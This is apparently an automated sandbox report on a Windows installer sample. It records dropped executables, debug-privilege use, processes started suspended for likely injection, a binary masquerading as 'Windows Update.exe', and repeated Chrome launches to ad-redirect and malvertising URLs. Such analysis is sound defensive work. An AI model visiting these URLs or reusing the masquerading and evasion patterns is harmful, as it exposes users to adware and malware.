Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\postproc-52.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nkn4qhlm.csu\autosubplayer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-IGHFO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\swresample-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1ffxnzir.1cn\random.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-QLPAO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\AForge.Video.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-T1381.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-9KFTG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\avfilter-2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-M2F05.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-2J58U.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-685QJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-CUGLT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\avdevice-53.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-O4BO6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-M2F05.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-3FQP6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-PVRDV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\i-record\is-L76RD.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Thread delayed: delay time: 480000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Thread delayed: delay time: 3600000
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Thread delayed: delay time: 922337203685477

Source: chrome.exe, 00000017.00000002.393990429.000001AC62CD0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
Source: chrome.exe, 00000018.00000003.376044571.0000018BEE6BF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.395688016.0000018BEE6D9000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404837215.0000018BEE6EA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396302527.0000018BEE6EA000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
Source: chrome.exe, 00000019.00000002.413066144.0000020F7E59B000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: 7((_8888YTR(.exe, 00000003.00000002.323240096.0000000000C3A000.00000004.00000020.sdmp, ZHunuhebaqu.exe, 00000014.00000002.364182317.0000000000A26000.00000004.00000020.sdmp, chrome.exe, 00000019.00000002.413066144.0000020F7E59B000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\1nJGU59JPU.exe

Code function: 0_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,

0_2_00409B78

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00452AD4 FindFirstFileA,GetLastError,	1_2_00452AD4
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_0046417C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_0046417C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_004645F8 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_004645F8
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00462BF0 FindFirstFileA,FindNextFileA,FindClose,	1_2_00462BF0
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00498FDC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,	1_2_00498FDC
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: 1_2_00475798 FindFirstFileA,FindNextFileA,FindClose,	1_2_00475798

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

Code function: 1_2_00450334 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00450334

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process created: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe "C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process created: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe "C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Process created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe "C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1339680	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1620783&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1343178	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=465	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=466	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1339680	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1620783&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1343178	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=465	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.cloud-security.xyz/u/script/redirect.php?zoneid=466	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851483	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1851513	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://www.directdexchange.com/jump/next.php?r=2087215	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.directdexchange.com/jump/next.php?r=4263119	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?id=1294231	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1492888&var=3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" http://vexacion.com/afu.php?zoneid=1343177&var=3	Jump to behavior
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process created: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe "C:\Program Files (x86)\windows multimedia platform\Windows Update.exe"
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process created: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe "C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe"
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process created: C:\Users\user\AppData\Local\Temp\c1-1f5b7-b4f-e62a7-a11f96f3c009f\TOHWVYYPNL.exe "C:\Users\user\AppData\Local\Temp\c1-1f5b7-b4f-e62a7-a11f96f3c009f\TOHWVYYPNL.exe"

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

Code function: 1_2_00478DC4 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,

1_2_00478DC4

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

1_2_0042E0AC

Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp

Code function: 1_2_0042EE28 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,

1_2_0042EE28

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: GetLocaleInfoA,	0_2_0040520C
Source: C:\Users\user\Desktop\1nJGU59JPU.exe	Code function: GetLocaleInfoA,	0_2_00405258
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: GetLocaleInfoA,	1_2_00408578
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp	Code function: GetLocaleInfoA,	1_2_004085C4

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
